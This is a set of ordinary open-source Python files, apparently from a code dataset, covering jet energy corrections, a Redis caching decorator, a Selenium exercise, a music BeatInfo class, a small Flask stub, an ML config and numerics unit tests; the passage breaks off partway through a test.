+{"seq_id":"73735821493","text":"import re\nfrom functools import reduce\n\nimport awkward\nimport dask_awkward\nimport numpy\n\nfrom coffea.lookup_tools.jme_standard_function import jme_standard_function\n\n\ndef _checkConsistency(against, tocheck):\n    if against is None:\n        against = tocheck\n    else:\n        if against != tocheck:\n            raise Exception(\n                \"Corrector for {} is mixed \"\n                \"with correctors for {}!\".format(tocheck, against)\n            )\n    return tocheck\n\n\n_levelre = re.compile(\"[L1-7]+\")\n\n\ndef _getLevel(levelName):\n    matches = _levelre.findall(levelName)\n    if len(matches) > 1:\n        raise Exception(f\"Malformed JEC level name: {levelName}\")\n    return matches[0]\n\n\n_level_order = [\"L1\", \"L2\", \"L3\", \"L2L3\", \"L4\", \"L5\", \"L6\", \"L7\"]\n\n\ndef _sorting_key(name_and_func):\n    this_level = _getLevel(name_and_func[0])\n    return _level_order.index(this_level)\n\n\nclass _getCorrectionFn:\n    def __init__(self, jec, **kwargs):\n        self.jec = jec\n        self.kwarg_keys = list(kwargs.keys())\n\n    def __call__(self, *args):\n        kwargs = {k: v for k, v in zip(self.kwarg_keys, args)}\n        corrs = self.jec.getSubCorrections(**kwargs)\n        return reduce(lambda x, y: y * x, corrs, 1.0)\n\n\nclass FactorizedJetCorrector:\n    \"\"\"\n    This class is a columnar implementation of the FactorizedJetCorrector tool in\n    CMSSW and FWLite. It applies a series of JECs in ascending order as defined by\n    '_level_order', and checks for the consistency of input corrections.\n\n    It implements the jet energy correction definition specified in the JEC TWiki_.\n\n    .. 
_TWiki: https://twiki.cern.ch/twiki/bin/view/CMS/JetEnergyScale\n\n    You can use this class as follows::\n\n        fjc = FactorizedJetCorrector(name1=corrL1,...)\n        jetCorrs = fjc(JetParameter1=jet.parameter1,...)\n\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        You construct a FactorizedJetCorrector by passing in a dict of names and functions.\n        Names must be formatted as '<campaign>_<dataera>_<datatype>_<level>_<jettype>'.\n        \"\"\"\n        jettype = None\n        levels = []\n        funcs = []\n        datatype = None\n        campaign = None\n        dataera = None\n        for name, func in kwargs.items():\n            if not isinstance(func, jme_standard_function):\n                raise Exception(\n                    \"{} is a {} and not a jme_standard_function!\".format(\n                        name, type(func)\n                    )\n                )\n            info = name.split(\"_\")\n            if len(info) > 6 or len(info) < 5:\n                raise Exception(\"Corrector name is not properly formatted!\")\n            offset = len(info) - 5\n\n            campaign = _checkConsistency(campaign, info[0])\n            dataera = _checkConsistency(dataera, info[1])\n            datatype = _checkConsistency(datatype, info[2 + offset])\n            levels.append(info[3 + offset])\n            funcs.append(func)\n            jettype = _checkConsistency(jettype, info[4 + offset])\n\n        if campaign is None:\n            raise Exception(\"Unable to determine production campaign of JECs!\")\n        else:\n            self._campaign = campaign\n\n        if dataera is None:\n            raise Exception(\"Unable to determine data era of JECs!\")\n        else:\n            self._dataera = dataera\n\n        if datatype is None:\n            raise Exception(\"Unable to determine if JECs are for MC or Data!\")\n        else:\n            self._datatype = datatype\n\n        if len(levels) == 0:\n            raise Exception(\"No levels provided?\")\n        else:\n            self._levels = levels\n            self._funcs = funcs\n\n        if jettype is None:\n            raise Exception(\"Unable to determine type of jet to correct!\")\n        else:\n            self._jettype = jettype\n\n        temp = list(zip(*sorted(zip(self._levels, self._funcs), key=_sorting_key)))\n        self._levels = list(temp[0])\n        self._funcs = list(temp[1])\n\n        # now we setup the call signature for this factorized JEC\n        self._signature = []\n        for func in self._funcs:\n            sig = func.signature\n            for input in sig:\n                if input not in self._signature:\n                    self._signature.append(input)\n\n    @property\n    def signature(self):\n        \"\"\"list the necessary jet properties that must be input to this function\"\"\"\n        return self._signature\n\n    def __repr__(self):\n        out = \"campaign : %s\\n\" % (self._campaign)\n        out += \"data era : %s\\n\" % (self._dataera)\n        out += \"data type : %s\\n\" % (self._datatype)\n        out += \"jet type : %s\\n\" % (self._jettype)\n        out += \"levels : %s\\n\" % (\",\".join(self._levels))\n        out += \"signature : (%s)\\n\" % (\",\".join(self._signature))\n        return out\n\n    def getCorrection(self, **kwargs):\n        \"\"\"\n        Returns the set of corrections for all input jets at the highest available level\n\n        Use it like::\n\n            jecs = corrector.getCorrection(JetProperty1=jet.property1,...)\n\n        \"\"\"\n        first_kwarg = kwargs[list(kwargs.keys())[0]]\n        if type(first_kwarg) is dask_awkward.Array:\n            levels = \"/\".join(self._levels)\n            func = _getCorrectionFn(self, **kwargs)\n            zl_out = func(\n                *tuple(\n                    awkward.Array(\n                        arg._meta.layout.form.length_zero_array(highlevel=False),\n                        behavior=arg.behavior,\n                    )\n                    for arg in kwargs.values()\n                )\n            )\n            meta = awkward.Array(\n                zl_out.layout.to_typetracer(forget_length=True),\n                behavior=zl_out.behavior,\n            )\n\n            return dask_awkward.map_partitions(\n                func,\n                *tuple(kwargs.values()),\n                label=f\"{self._campaign}-{self._dataera}-{self._datatype}-{levels}-{self._jettype}\",\n                meta=meta,\n            )\n        else:\n            corrs = self.getSubCorrections(**kwargs)\n            return reduce(lambda x, y: y * x, corrs, 
1.0)\n\n def getSubCorrections(self, **kwargs):\n \"\"\"\n Returns the set of corrections for all input jets broken down by level\n\n Use it like::\n\n jecs = corrector.getSubCorrections(JetProperty1=jet.property1,...)\n #'jecs' will be formatted like [[jec_jet1 jec_jet2 ...] ...]\n\n \"\"\"\n # cache = kwargs.pop(\"lazy_cache\", None)\n # form = kwargs.pop(\"form\", None)\n corrVars = {}\n if \"JetPt\" in kwargs.keys():\n corrVars[\"JetPt\"] = kwargs[\"JetPt\"]\n kwargs.pop(\"JetPt\")\n if \"JetE\" in kwargs.keys():\n corrVars[\"JetE\"] = kwargs[\"JetE\"]\n kwargs.pop(\"JetE\")\n if len(corrVars) == 0:\n raise Exception(\"No variable to correct, need JetPt or JetE in inputs!\")\n\n corrections = []\n for i, func in enumerate(self._funcs):\n sig = func.signature\n cumCorr = reduce(lambda x, y: y * x, corrections, 1.0)\n\n fargs = tuple(\n (cumCorr * corrVars[arg]) if arg in corrVars.keys() else kwargs[arg]\n for arg in sig\n )\n\n # lookup_base handles dask/awkward/numpy\n if isinstance(\n fargs[0], (dask_awkward.Array, awkward.highlevel.Array, numpy.ndarray)\n ):\n corrections.append(\n func(\n *fargs,\n dask_label=f\"{self._campaign}-{self._dataera}-{self._datatype}-{self._levels[i]}-{self._jettype}\",\n )\n )\n else:\n raise Exception(\"Unknown array library for inputs.\")\n\n return corrections\n","repo_name":"CoffeaTeam/coffea","sub_path":"src/coffea/jetmet_tools/FactorizedJetCorrector.py","file_name":"FactorizedJetCorrector.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"21"} +{"seq_id":"30195043353","text":"def prev_pos(x):\n if x == 'B':\n return 'J'\n elif x == 'O':\n return 'B'\n elif x == 'J':\n return 'O'\n\nn = int(input())\narr = list(input())\nMAX = 1000001\ndp = [MAX] * n # 1000**2 + 1 로 초기화\ndp[0] = 0\n\nfor i in range(1, n):\n prev = prev_pos(arr[i])\n\n for j in range(i):\n if arr[j] == prev:\n dp[i] = min(dp[i], dp[j] + (i-j)**2)\n\nprint(dp[n-1] if dp[n-1] != MAX else -1)\n\n# DP 문제\n# prev_pos 함수를 따로 빼는게 더 효율적","repo_name":"seokzin/algorithm-python","sub_path":"Code/Backjoon/12026-BOJ 거리.py","file_name":"12026-BOJ 거리.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70210707894","text":"def read_file(fp):\n with open(fp, 'r') as ifs:\n for line in ifs:\n text = line.strip()\n if text:\n yield text\n\n\ndef process(a):\n values = list(map(int, a))\n positions = {x: i for i, x in enumerate(values)}\n for i, x in enumerate(values):\n y = 2020 - x\n if positions.get(y, -1) > i:\n return x * y\n\n\nif __name__ == '__main__':\n a = read_file('input.txt')\n r = process(a)\n print(r)\n","repo_name":"m-tkach/adventofcode","sub_path":"2020/01/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24567990890","text":"# -*- coding: utf-8 -*-\nfrom functools import wraps\nimport hashlib\nimport logging\nimport json\nimport redis\n\n\nclass MyRedis(object):\n def __init__(self, host, port, password,db=0):\n self.pool = redis.ConnectionPool(host=host, password=password, port=port, db=db)\n self.rs = redis.Redis(connection_pool=self.pool, db=db)\n\n def get_redis(self):\n return self.rs\n\n\ndef redising(time=0, redis_key_prefix=\"_lever_utils\", db=None):\n '''\n redis 装饰器\n :param time: 保留时常\n # time==0,则不走缓存;\n # time>0,则走缓存,缓存时间为time;\n # time==-1,则走缓存,缓存时间为永久.\n # 
time == -2: always recompute, then permanently overwrite the cached value\n    :param redis_key_prefix: prefix for the generated redis key\n    :return:\n    '''\n    def func_wrapper(func):\n        @wraps(func)\n        def return_wrapper(*args, **kwargs):\n            if time == 0 or db is None:\n                return func(*args, **kwargs), None\n            func_info_str = \"model[%s]\\t func[%s]\\t file[%s][%s]\\t args[%s]\\t kwargs[%s]\" % (func.__module__\n                , func.__name__\n                , func.__code__.co_filename\n                , func.__code__.co_firstlineno\n                , args\n                , kwargs)\n            m2 = hashlib.md5()\n            m2.update(func_info_str.encode('utf-8'))\n            func_info_str_md5 = m2.hexdigest()\n            func_info_str_md5_redis_key = redis_key_prefix+\"-\"+func_info_str_md5\n            redis_store = db\n            if time == -1 or time > 0:\n                redis_result = redis_store.get(func_info_str_md5_redis_key)\n                if redis_result is None:\n                    func_result = func(*args, **kwargs)\n                    redis_store.set(func_info_str_md5_redis_key, json.dumps(func_result), time if time > 0 else None)\n                else:\n                    logging.info(\"to-redis:key[%s]\" % func_info_str_md5_redis_key)\n                    func_result = json.loads(redis_result)\n            else:\n                func_result = func(*args, **kwargs)\n                redis_store.set(func_info_str_md5_redis_key, json.dumps(func_result))\n            return func_result, func_info_str_md5_redis_key\n        return return_wrapper\n    return func_wrapper","repo_name":"0lever/utils","sub_path":"_lever_utils/foo/helpers/db/redis_helper.py","file_name":"redis_helper.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30999261897","text":"import math\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://suninjuly.github.io/redirect_accept.html\")\n\ntry:\n\n    first_window = browser.window_handles[0]\n\n    main_button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n    main_button.click()\n\n    second_window = browser.window_handles[1]\n\n    browser.switch_to.window(second_window)\n\n    def calc(text_value):\n        return str(math.log(abs(12*math.sin(int(text_value)))))\n    formula_text = browser.find_element(By.ID, \"input_value\")\n    text_value = formula_text.text\n    answer_value = calc(text_value)\n\n    input_answer = browser.find_element(By.ID, \"answer\")\n    input_answer.send_keys(answer_value)\n\n    button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n    button.click()\n\nfinally:\n    time.sleep(15)\n    browser.quit()","repo_name":"MaximOkhri/autotest_course","sub_path":"new_window_script.py","file_name":"new_window_script.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28795737547","text":"\"\"\" Class implementation of BeatInfo \"\"\"\n\nclass BeatInfo(object):\n\n    def __init__(self, tatums=2, beatDurationSec=.5, tatumProportions=None):\n        \"\"\" Initialize a BeatInfo. 
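A BeatInfo bundles the tatum subdivision of one beat, the beat duration in seconds and optional per-tatum proportions; for example (hypothetical values), BeatInfo(4, 0.5) describes a half-second beat split into four equal tatums.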
\n        Note: tatumProportions can be either a tuple whose length equals the tatum division\n        or None, which implies equal proportions\n        \"\"\"\n        self.setTatums(tatums)\n        self.setBeatDurationSec(beatDurationSec)\n        self.setTatumProportions(tatumProportions)\n\n    def clone(self):\n        \"\"\" Returns a deep copy\"\"\"\n        return BeatInfo(self.getTatums(), self.getBeatDurationSec(), self.getTatumProportions())\n\n    def hasEqualProportions(self):\n        \"\"\" Check whether all tatum proportions are equal \"\"\"\n        return self.getTatumProportions() is None or self.getTatumProportions() == self.makeNTuple(self.getTatums())\n\n    def rescale(self, factor, force=False, upscale=True):\n        if not force and not self.hasEqualProportions():\n            raise RuntimeError(\"Rescale not possible due to non-equal tatum proportions.\")\n        tatums = self.getTatums()\n        if upscale:\n            self.setTatums(tatums*factor)\n        else:\n            if tatums % factor != 0:\n                raise ValueError(\"Factor {} is not a divisor of tatums {}\".format(factor, tatums))\n            else:\n                self.setTatums(tatums//factor)\n        self.setTatumProportions(None)\n        return self\n\n    def setTatums(self, val):\n        \"\"\" Set tatums. Does no(!) consistency check on tatum proportions!\"\"\"\n        if int(val) > 0:\n            self.__tatums = int(val)\n        else:\n            raise ValueError(\"Invalid value for tatums {}\".format(val))\n        return self\n\n    def getTatums(self):\n        \"\"\" Get tatums \"\"\"\n        return self.__tatums\n\n    def setBeatDurationSec(self, val):\n        \"\"\" Set beat duration in seconds \"\"\"\n        if val >= 0:\n            self.__beatDurationSec = float(val)\n        else:\n            raise ValueError(\"Invalid value ({}) for beat duration!\".format(val))\n        return self\n\n    def getBeatDurationSec(self):\n        \"\"\" Get beat duration in seconds \"\"\"\n        return self.__beatDurationSec\n\n    def setTatumProportions(self, val):\n        \"\"\" Set tatum proportions. 
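Pass None for equal proportions or a tuple of relative weights, e.g. a hypothetical (2, 1) for a two-tatum swing feel. 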
Must be consistent with tatum number\"\"\"\n if val == None:\n self.__tatumProportions = None \n elif isinstance(val, tuple):\n if len(val) == self.__tatums:\n self.__tatumProportions = val\n else:\n raise ValueError(\"Expected length {}, got {} \".format(self.__tatums, len(val)))\n else:\n raise ValueError(\"Expected tuple for tatum proportion.\")\n return self\n\n def getTatumProportions(self):\n \"\"\" Get tatum proportion \"\"\"\n return self.__tatumProportions\n \n def fractions(self, closeIt = True): \n \"\"\" Calculates tatum proportions represented as a list of points in the interval 0..1\"\"\"\n fractions = [0]\n if self.__tatumProportions == None:\n units = (self.__tatums)\n for i in range(1, self.__tatums): \n fractions.append(float(i)/units)\n else:\n units = sum(self.__tatumProportions) \n for i in range(1, len(self.__tatumProportions)): \n fractions.append(float(sum(self.__tatumProportions[0:i]))/units)\n if closeIt:\n fractions.append(1)\n return fractions\n\n def __eq__(self, bi):\n \"\"\" Compare two BeatInfo objects for equality \"\"\"\n if not isinstance(bi, BeatInfo):\n return False\n if self.getTatums() == bi.getTatums() and self.getBeatDurationSec() == bi.getBeatDurationSec() and self.getTatumProportions() == bi.getTatumProportions():\n return True\n return False\n\n def __ne__(self, bi):\n \"\"\" Compare two BeatInfo objects for inequality \"\"\"\n return not self.__eq__(bi) \n\n def makeNTuple(self, n, val = 1):\n t = ()\n for i in range(n):\n t = t + (val,) \n return t \n\n def toString(self, sep=\"|\"):\n if not isinstance(sep, str):\n sep = \"|\"\n return sep.join([str(self.getTatums()), str(self.getBeatDurationSec()), str(self.getTatumProportions())])\n\n def __str__(self): return self.toString()\n\n tatums = property(getTatums, setTatums)\n beatDurationSec = property(getBeatDurationSec, setBeatDurationSec)\n tatumProportion = property(getTatumProportions, setTatumProportions)\n","repo_name":"klausfrieler/melospy","sub_path":"melospy/basic_representations/beat_info.py","file_name":"beat_info.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32348853548","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS\nimport random\nfrom flask_responses import json_response\n\napp=Flask(__name__)\napi= Api(app)\nCORS(app)\n\nresultlist = [\"Fake\",\"Real\"]\n\nclass User(Resource):\n def get(self):\n # randomly choosing real or fake and return with response status 200\n result = random.choice(resultlist)\n print(result)\n return json_response({\"result\":result}, status_code=200)\n \n def post(self, name):\n a = \"url added to db\"\n return a,200\n\napi.add_resource(User, \"/\")\nif __name__ == '__main__':\n app.run()","repo_name":"Poojavpatel/simple_api","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38151127058","text":"name = input(\"Username : \")\nage = int(input('Age : '))\n\nprint(f\"Hello {name}!\")\n\ndef checkMail():\n email = input(\"Enter your email : \")\n print(f\"Pls check your email : {email}\")\n checkmail = input(\"Right? (y/n) : \")\n return checkmail\n\nif age >= 18: \n print('You are adult. 
You can save money in our bank')\n\n    cond = True\n    while cond:\n        a = checkMail()\n        if a == 'y' or a == 'Y':\n            cond = False\n        elif a == 'n' or a == 'N':\n            continue\n        else:\n            print(\"Wrong input, please enter only 'y' or 'n'.\")\n    print(\"Congratulations....Well Done!\")\n\n\nelse:\n    print(\"Sorry, you can't save your money because you are too young\")\n\n\n\n","repo_name":"orochidasbala/GitTesting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72754861814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 6 22:48:41 2022\n\n@author: Ali\n\"\"\"\n\nimport argparse\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Interpretable CNN')\n\ndef str2bool(v):\n    if isinstance(v, bool):\n        return v\n    if v.lower() in ('yes', 'true', 't', 'y', '1'):\n        return True\n    elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n        return False\n    else:\n        raise argparse.ArgumentTypeError('Boolean value expected.')\n\n# choose whether to train a CF model for a given base model or train a base model from scratch\n#parser.add_argument('--create_counterfactual_combined' ,default = True,type=str2bool)## create CF model for a pretrained base model or train a new base model\nparser.add_argument('--filter_visualization' ,default = True,type=str2bool) # find top k highest and lowest activation magnitudes for the target filter and the corresponding images\n\nparser.add_argument('--user_evaluation' ,default = False,type=str2bool) # save images\n\n# CF model args\nparser.add_argument('--train_counterfactual_net' ,default = True, type=str2bool)##\nparser.add_argument('--train_all_classes' ,default = True, type=str2bool)##\nparser.add_argument('--dropout' ,default = False, type=str2bool)## don't use... 
not good results\n\nparser.add_argument('--train_singular_counterfactual_net' ,default = False, type=str2bool)## \nparser.add_argument('--choose_subclass' ,default = False, type=str2bool)## choose subclass for training on\n\nparser.add_argument('--counterfactual_PP' ,default = False, type=str2bool)## whether to generate filters for PP or PN case \nparser.add_argument('--resume_counterfactual_net' ,default = True, type=str2bool)## False = train CF model from scratch; True = resume training CF model\nparser.add_argument('--resume_from_epoch' ,default = 30, type=np.int32)## False = train CF model from scratch; True = resume training CF model\nparser.add_argument('--test_counterfactual_net' ,default = False, type=str2bool)## \nparser.add_argument('--load_counterfactual_net',default = True, type=str2bool)\nparser.add_argument('--resume', default =True, type=str2bool) # load saved weights for base model\nparser.add_argument('--alter_class', default = 0, type = np.int32) # alter class #misclassified classes 9-170\nparser.add_argument('--analysis_class', default = 6, type = np.int32) # class for which images are loaded and analyzed\nparser.add_argument('--find_global_filters', default = False, type=str2bool) # perform statistical analysis to find the activation magnitude of all filters for the alter class and train images of alter class\n#parser.add_argument('--alter_class_2', default = 0, type = np.int32) # alter class for 2nd example, 9, 170, 25, 125, 108\nparser.add_argument('--cfe_epochs', default = 60, type = np.int32 ) #100 for mnist, 200 for CUB\nparser.add_argument('--l1_weight', default = 2, type = np.float32) # 2 default\nparser.add_argument('--save_logFile', default = True, type=str2bool) #\n\n#parser.add_argument('--pretrained', default = False) # load self-pretrained model for cifar dataset... i.e. 
load base model already trained on cifar-10\n\n# common args\nparser.add_argument('--augmentation' ,default = True, type=str2bool)## \n\n#base model parameters\nparser.add_argument('--dataset',default = 'fmnist')#NIST, BraTS,mnist, cifar10, CUB200, #cxr1000, #catsvsdogs, #VOC2010, #fmnist\nparser.add_argument('--save_directory',default = './trained_weights/')\nparser.add_argument('--train_using_builtin_fit_method',default = True)#for training base model easily\nparser.add_argument('--train',default = False)\nparser.add_argument('--fine_tune',default = False) # fine tune all weights after transfer learning step (CUB dataset)\nparser.add_argument('--test', default = True)\nparser.add_argument('--model',default = 'customCNN/')#customCNN, VGG16, resnet50,efficientnet, inceptionv3\nparser.add_argument('--imagenet_weights',default = False) #use imageNet pretrained weights (True for CUB dataset)\n\nKAGGLE = False\n\nif KAGGLE: \n args = parser.parse_known_args()[0]\n args.save_directory = \"/kaggle/working/trained_weights/\" \n kaggle_load_dir = \"/kaggle/input/train-cfe-model-kaggle/trained_weights/\"\nelse: \n args = parser.parse_args()\n\nif (args.train_counterfactual_net and args.train_all_classes):\n dropout = \"\"\n if args.dropout:\n dropout = \"dropout\"\n weights_path = args.save_directory+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.cfe_epochs)\n if KAGGLE:\n resume_path = kaggle_load_dir+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.resume_from_epoch)\n else:\n resume_path = args.save_directory+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.resume_from_epoch)\n pretrained_weights_path = args.save_directory+args.model+args.dataset+'/standard'\nelse:\n weights_path = args.save_directory+args.model+args.dataset+'/standard'\n pretrained_weights_path = weights_path\n resume_path = args.save_directory+args.model+args.dataset+'/standard/epochs_'+str(args.resume_from_epoch)\n","repo_name":"alitariq-syed/Counterfactual-Explanation-Model","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71125574452","text":"\nfrom versions import scipy_available\n\n\ndef test_import():\n import numerics\n from numerics import curve_fit\n from numerics import morse,morse_re,morse_a,morse_De,morse_Einf,morse_width\n from numerics import morse_depth,morse_Ee,morse_k,morse_params\n from numerics import morse_reduced_mass,morse_freq,morse_w,morse_wX\n from numerics import morse_En,morse_zero_point,morse_harmfreq\n from numerics import morse_harmonic_potential,morse_spect_fit\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n from numerics import murnaghan,birch,vinet\n from numerics import murnaghan_pressure,birch_pressure,vinet_pressure\n from numerics import eos_param,eos_eval,eos_fit,eos_Einf,eos_V,eos_B,eos_Bp\n from numerics import jackknife,jackknife_aux,check_jackknife_inputs\n from numerics import ndgrid\n from numerics import simstats,simplestats,equilibration_length,ttest\n from numerics import surface_normals,simple_surface\n from numerics import func_fit\n from numerics import distance_table,nearest_neighbors,voronoi_neighbors\n from numerics import convex_hull\n\n#end def test_import\n\n\n\ndef test_ndgrid():\n import numpy as np\n from testing import value_eq\n from numerics import ndgrid\n\n x = [0,1,2.]\n y = [3,4.,5,6]\n z = [7,8,9,10,11.]\n\n points = 
np.zeros((3,len(x)*len(y)*len(z)),dtype=float)\n n = 0\n for xv in x:\n for yv in y:\n for zv in z:\n points[:,n] = xv,yv,zv\n n += 1\n #end for\n #end for\n #end for\n points = np.array(points)\n points.shape = 3,len(x),len(y),len(z)\n points = points\n\n grid = ndgrid(x,y,z)\n\n assert(value_eq(grid,points))\n#end def test_ndgrid\n\n\n\ndef test_distance_table():\n import numpy as np\n from testing import value_eq\n from numerics import distance_table\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [0,0,1],\n [1,1,0],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n d0 = 0.0\n d1 = 1.0\n d2 = np.sqrt(2.)\n d3 = np.sqrt(3.)\n\n dtable = [[d0,d1,d1,d1,d2,d2,d2,d3],\n [d1,d0,d2,d2,d1,d1,d3,d2],\n [d1,d2,d0,d2,d1,d3,d1,d2],\n [d1,d2,d2,d0,d3,d1,d1,d2],\n [d2,d1,d1,d3,d0,d2,d2,d1],\n [d2,d1,d3,d1,d2,d0,d2,d1],\n [d2,d3,d1,d1,d2,d2,d0,d1],\n [d3,d2,d2,d2,d1,d1,d1,d0]]\n dtable = np.array(dtable,dtype=float)\n dt = distance_table(points,points)\n assert(value_eq(dt,dtable))\n\n dtable = [[d0,d1,d1,d1],\n [d1,d0,d2,d2],\n [d1,d2,d0,d2],\n [d1,d2,d2,d0],\n [d2,d1,d1,d3],\n [d2,d1,d3,d1],\n [d2,d3,d1,d1],\n [d3,d2,d2,d2]]\n dtable = np.array(dtable,dtype=float)\n dt = distance_table(points,points[0:4])\n assert(value_eq(dt,dtable))\n\n points = [\n [0,0,0],\n [1,1,0],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n dtable = [[d0,d2,d3],\n [d0,d1,d2],\n [d0,d1,d3]]\n dtable = np.array(dtable,dtype=float)\n dtable_order = [[0,1,2],\n [1,2,0],\n [2,1,0]]\n dtable_order = np.array(dtable_order,dtype=int)\n dt,order = distance_table(points,points,ordering=1)\n assert(value_eq(dt,dtable))\n assert(value_eq(order,dtable_order))\n\n dtable = [[d0,d2,d3],\n [d0,d1,d2],\n [d0,d1,d3]]\n dtable = np.array(dtable,dtype=float)\n dtable_order = [[0,1,2],\n [1,2,0],\n [2,1,0]]\n dtable_order = np.array(dtable_order,dtype=int)\n dt,order = distance_table(points,points,ordering=2)\n assert(value_eq(dt,dtable))\n assert(value_eq(order,dtable_order))\n\n#end def test_distance_table\n \n\n\ndef test_nearest_neighbors():\n import numpy as np\n from testing import value_eq\n from numerics import nearest_neighbors\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n plow = points[:4]\n phigh = points[4:]\n\n d0 = 0.0\n d1 = 1.0\n d2 = np.sqrt(2.)\n d3 = np.sqrt(3.)\n\n nn_ref = [[0,1,2],\n [1,0,3],\n [2,0,3],\n [3,1,2]]\n nn_ref = np.array(nn_ref,dtype=int)\n\n dist_ref = [[d1,d2,d2],\n [d1,d2,d2],\n [d1,d2,d2],\n [d1,d2,d2]]\n dist_ref = np.array(dist_ref,dtype=float)\n\n def check_nn(nn):\n for n,nr in zip(nn,nn_ref):\n assert(n[0]==nr[0])\n assert(set(n[1:])==set(nr[1:]))\n #end for\n #end def check_nn\n\n nn = nearest_neighbors(3,plow,phigh,slow=True)\n check_nn(nn)\n\n nn,dist = nearest_neighbors(3,plow,phigh,return_distances=True,slow=True)\n check_nn(nn)\n assert(value_eq(dist,dist_ref))\n\n if scipy_available:\n nn = nearest_neighbors(3,plow,phigh)\n check_nn(nn)\n\n nn,dist = nearest_neighbors(3,plow,phigh,return_distances=True)\n check_nn(nn)\n assert(value_eq(dist,dist_ref))\n #end if\n\n#end def test_nearest_neighbors\n\n\n\nif scipy_available:\n def test_voronoi_neighbors():\n import numpy as np\n from testing import value_eq\n from numerics import voronoi_neighbors\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n joggle = np.array(\n [[0.60801892, 0.68024807, 
0.09037058],\n [0.95800898, 0.43112463, 0.52981569],\n [0.08862067, 0.69084511, 0.35177345],\n [0.37363091, 0.57409599, 0.95654043],\n [0.8310818 , 0.17146777, 0.90490215],\n [0.17600223, 0.89772462, 0.75582196],\n [0.7408217 , 0.22768522, 0.64564984],\n [0.71678216, 0.6409734 , 0.53354209]])\n joggle *= 1e-8\n\n points += joggle\n\n nn_pairs_ref = [[0,1],\n [0,2],\n [0,4],\n [0,3],\n [0,6],\n [0,5],\n [7,3],\n [7,5],\n [7,6],\n [3,1],\n [3,2],\n [3,6],\n [3,5],\n [1,5],\n [5,4],\n [5,6],\n [6,4],\n [6,2]]\n nn_pairs_ref = np.array(nn_pairs_ref,dtype=int)\n\n d1 = 1.0\n d2 = float(np.sqrt(2.))\n\n nn_pairs = voronoi_neighbors(points)\n\n dist_ref = 3*[d1]+3*[d2]+5*[d1]+2*[d2]+2*[d1]+[d2]+2*[d1]\n\n assert(isinstance(nn_pairs,np.ndarray))\n nn_pairs = np.array(nn_pairs,dtype=int)\n assert(value_eq(nn_pairs,nn_pairs_ref))\n\n for n,(i,j) in enumerate(nn_pairs):\n d = np.linalg.norm(points[i]-points[j])\n assert(value_eq(float(d),dist_ref[n]))\n #end for\n\n #end def test_voronoi_neighbors\n\n\n\n def test_convex_hull():\n import numpy as np\n from testing import value_eq\n from numerics import convex_hull\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)-0.5\n \n points = np.append(2*points,points,axis=0)\n\n hull = convex_hull(points)\n\n assert(hull==list(range(8)))\n #end def test_convex_hull\n#end if\n\n\n\nimport numpy as np\ndef random_stream(n):\n\n def rng(m=2**32, a=1103515245, c=12345):\n rng.current = (a*rng.current + c) % m\n return float(rng.current)/m\n #end def rng\n\n rng.current = 1\n\n return np.array([rng() for i in range(n)],dtype=float)\n#end def random_stream\n\n\nrstream = random_stream(1000)\nrstream_wide = np.array(10*[rstream])\n\n\n\ndef test_simplestats():\n import numpy as np\n from testing import value_eq\n from numerics import simplestats\n\n m,e = simplestats(rstream)\n\n m_ref = 0.507154277182\n e_ref = 0.00916655521114\n\n assert(value_eq(float(m),m_ref))\n assert(value_eq(float(e),e_ref))\n\n m_ref = np.array(10*[m_ref])\n e_ref = np.array(10*[e_ref])\n\n m,e = simplestats(rstream_wide)\n\n assert(value_eq(m,m_ref))\n assert(value_eq(e,e_ref))\n#end def test_simplestats\n\n\n\ndef test_simstats():\n import numpy as np\n from testing import value_eq\n from numerics import simstats\n\n m,v,e,k = 